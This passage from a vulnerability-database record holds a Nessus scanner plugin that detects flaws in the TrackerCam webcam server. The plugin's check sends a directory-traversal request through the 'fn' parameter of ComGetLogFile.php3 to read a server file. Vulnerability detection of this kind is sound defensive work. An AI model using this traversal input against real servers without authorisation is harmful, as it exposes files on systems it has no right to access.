attack.", "edition": 24, "published": "2005-02-21T00:00:00", "title": "TrackerCam Multiple Remote Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0480", "CVE-2005-0479", "CVE-2005-0482", "CVE-2005-0481", "CVE-2005-0478"], "modified": "2005-02-21T00:00:00", "cpe": [], "id": "TRACKERCAM_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/17160", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17160);\n script_version(\"1.18\");\n script_cve_id(\"CVE-2005-0478\", \"CVE-2005-0479\", \"CVE-2005-0480\", \"CVE-2005-0481\", \"CVE-2005-0482\");\n script_bugtraq_id(12592);\n \n script_name(english:\"TrackerCam Multiple Remote Vulnerabilities\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is running TrackerCam, a HTTP software that allows a\nuser to publish a webcam feed thru a website.\n\nThe remote version of this software is affected by multiple\nvulnerabilities :\n\n - Buffer overflows which may allow an attacker to execute\n arbitrary code on the remote host.\n\n - A directory traversal bug that may allow an attacker to\n read arbitrary files on the remote host with the \n privileges of the web server daemon.\n\n - A cross-site scripting issue that may allow an attacker\n to use the remote host to perform a cross-site scripting\n attack.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://www.securityfocus.com/archive/1/390918/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Unknown at this time.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TrackerCam PHP Argument Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/18\");\n\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Checks for flaws in TrackerCam\");\n \n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8090);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8090);\n\nbanner = get_http_banner(port:port);\nif ( \"Server: TrackerCam/\" >!< banner ) exit(0);\n\nw = http_send_recv3(method:\"GET\", item:\"/tuner/ComGetLogFile.php3?fn=../HTTPRoot/tuner/ComGetLogFile.php3\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = strcat(w[0], w[1], '\\r\\n', w[2]);\nif ( \"$fcontents = file ('../../log/'.$fn);\" >< res )\n{\n\tsecurity_hole(port);\n\tset_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
